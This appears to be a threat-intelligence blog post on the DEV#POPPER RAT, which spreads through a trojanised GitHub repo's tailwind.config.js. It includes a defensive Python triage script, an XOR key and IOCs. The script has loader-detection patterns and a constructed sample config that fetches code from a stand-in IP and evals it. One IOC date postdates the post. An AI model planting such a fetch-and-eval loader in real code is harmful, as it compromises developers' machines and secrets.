Learn more about the DEV#POPPER remote access trojan and how to protect your organization from this threat.

2026-03-05 eSentire

https://www.esentire.com/blog/north-korean-apt-malware-analysis-dev-popper-rat-and-omnistealer-everyday-im-shufflin


eSentire's Threat Response Unit (TRU) observed DEV#POPPER on an Energy, Utilities, and Waste customer machine in February 2026 and attributes the activity with high confidence to a North Korean state-sponsored APT, based on TTPs shared with related campaigns. The intrusion began when the victim cloned the weaponized ShoeVista GitHub repository and launched its frontend, which executed obfuscated JavaScript hidden in frontend/tailwind.config.js. Because Node evaluates tailwind.config.js as ordinary JavaScript when the frontend is built or started, cloning and running an untrusted repository is arbitrary code execution on the developer's workstation; no separate exploit is needed. The loader contacted 23.27.20[.]143 using custom request headers, decrypted the follow-on code with the repeating XOR key "ThZG+0jfXE6VAGOJ", and ultimately loaded the DEV#POPPER RAT together with the Python-based OmniStealer.

The malware most often targets macOS but also supports Windows and Linux. Its objectives include cryptocurrency wallet theft and access to developer secrets such as source-code credentials, API keys, passwords, and cloud tokens.
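Two checks that follow directly from the chain above, as an added example for this write-up and not eSentire's or the campaign's code: a scan of JavaScript build/config files for constructs a loader needs but a real tailwind.config.js never contains, and repeating-key XOR recovery of a captured stage using the key the write-up publishes (plus key recovery from known plaintext, for variants that rotate the key). The sample config and second stage are constructed, 203.0.113.10 is an RFC 5737 documentation address standing in for the real C2, and the indicator list is a heuristic starting point rather than a signature for this specific sample.

```python
"""
Triage helpers for 'clone this repo and run it' lures of the DEV#POPPER kind.
Added example for this write-up, not eSentire's or the campaign's code.

1. scan_js_for_loader(): flags constructs an obfuscated loader needs (eval,
   child_process, an HTTP client, raw-IP URLs, hex-escaped or base64 blobs)
   in a JS build/config file that should contain none of them.
2. xor_decrypt() / recover_xor_key(): repeating-key XOR, the transform the
   write-up reports for the staged payload, so a captured blob can be
   recovered with the published key, or the key recovered from known plaintext.
"""
import re

# Key published in the write-up; the stage is a byte blob, so the key is bytes too.
KEY = b"ThZG+0jfXE6VAGOJ"

# A genuine tailwind.config.js exports content/theme settings and nothing else.
LOADER_PATTERNS = {
    "dynamic_eval": re.compile(r"\b(?:eval|new\s+Function)\s*\("),
    "process_spawn": re.compile(r"require\(\s*['\"]child_process['\"]\s*\)"),
    "network_client": re.compile(r"require\(\s*['\"](?:https?|net|axios|node-fetch)['\"]\s*\)"),
    "raw_ipv4_url": re.compile(r"https?://(?:\d{1,3}\.){3}\d{1,3}"),
    "hex_escaped_string": re.compile(r"(?:\\x[0-9a-fA-F]{2}){8,}"),
    "long_base64_blob": re.compile(r"['\"][A-Za-z0-9+/]{200,}={0,2}['\"]"),
}


def scan_js_for_loader(source: str) -> list[str]:
    """Return the sorted names of loader indicators present in a JS source string."""
    return sorted(name for name, rx in LOADER_PATTERNS.items() if rx.search(source))


def xor_decrypt(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR; symmetric, so the same call also encrypts."""
    if not key:
        raise ValueError("empty key")
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def recover_xor_key(captured: bytes, known_prefix: bytes, key_len: int) -> bytes:
    """Known-plaintext recovery for repeating-key XOR: C[i] ^ P[i] == K[i % key_len],
    so key_len bytes of known plaintext (a JS prologue, a shebang) yield the whole key."""
    if len(known_prefix) < key_len or len(captured) < key_len:
        raise ValueError("need at least key_len bytes of ciphertext and known plaintext")
    return bytes(c ^ p for c, p in zip(captured[:key_len], known_prefix[:key_len]))


def triage(config_source: str, captured_stage: bytes, key: bytes) -> dict:
    """Scan the on-disk config, then decrypt the fetched stage and scan it as JS too:
    the stage is where the real loader lives, and raw bytes would match nothing."""
    stage = xor_decrypt(captured_stage, key)
    return {
        "config_findings": scan_js_for_loader(config_source),
        "stage_findings": scan_js_for_loader(stage.decode("utf-8", "replace")),
        "stage_preview": stage[:60].decode("utf-8", "replace"),
    }


# --- Constructed sample data (not the real ShoeVista files) ---------------------
# 203.0.113.10 is a TEST-NET-3 documentation address standing in for the C2.
SAMPLE_CONFIG = '''
module.exports = { content: ["./src/**/*.{js,jsx}"], theme: { extend: {} }, plugins: [] };
(function () {
  const h = require("http");
  const cp = require("child_process");
  h.get("http://203.0.113.10/s", (r) => {
    let d = "";
    r.on("data", (c) => (d += c));
    r.on("end", () => eval(d));
  });
})();
'''

CLEAN_CONFIG = '''
module.exports = { content: ["./index.html", "./src/**/*.{js,ts,jsx,tsx}"], theme: { extend: {} }, plugins: [] };
'''

# Constructed second stage and the blob a proxy would have captured for it.
STAGE2_PLAINTEXT = b'const cp = require("child_process");\ncp.exec("python3 -V");\n'
CAPTURED_STAGE = xor_decrypt(STAGE2_PLAINTEXT, KEY)  # XOR is symmetric

if __name__ == "__main__":
    print("clean config:", scan_js_for_loader(CLEAN_CONFIG) or "no findings")
    print("triage:", triage(SAMPLE_CONFIG, CAPTURED_STAGE, KEY))
    print("recovered key:", recover_xor_key(CAPTURED_STAGE, STAGE2_PLAINTEXT[:16], 16))
```

Run the scan over every *.config.js, webpack/vite config and package.json script in an untrusted clone before the first `npm install` or `npm run dev`; install-time lifecycle scripts are a second execution path and deserve the same look. The XOR helpers are only useful once a proxy or EDR has captured the stage, and the key-recovery routine assumes the variant keeps repeating-key XOR with a known prefix in the plaintext.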

Indicators of Compromise

Type        Value                              First Seen   Last Seen
IPv4        198.105.127.210                    2026-03-05   2026-06-12
IPv4        23.27.20.143                       2025-10-20   2026-04-21
DOMAIN      bsc-dataseed.binance.org           2025-10-27   2026-04-11
DOMAIN      bsc-rpc.publicnode.com             2025-10-27   2026-04-11
HASH (MD5)  9a47bb48b7b8ca41fc138fd3372e8cc0   2026-03-05   2026-03-05

Note that bsc-dataseed.binance.org and bsc-rpc.publicnode.com are public BNB Smart Chain JSON-RPC endpoints that legitimate Web3 tooling also uses; treat connections to them from developer workstations as a hunting lead to correlate with the IPs and hash above rather than as a standalone blocking decision.
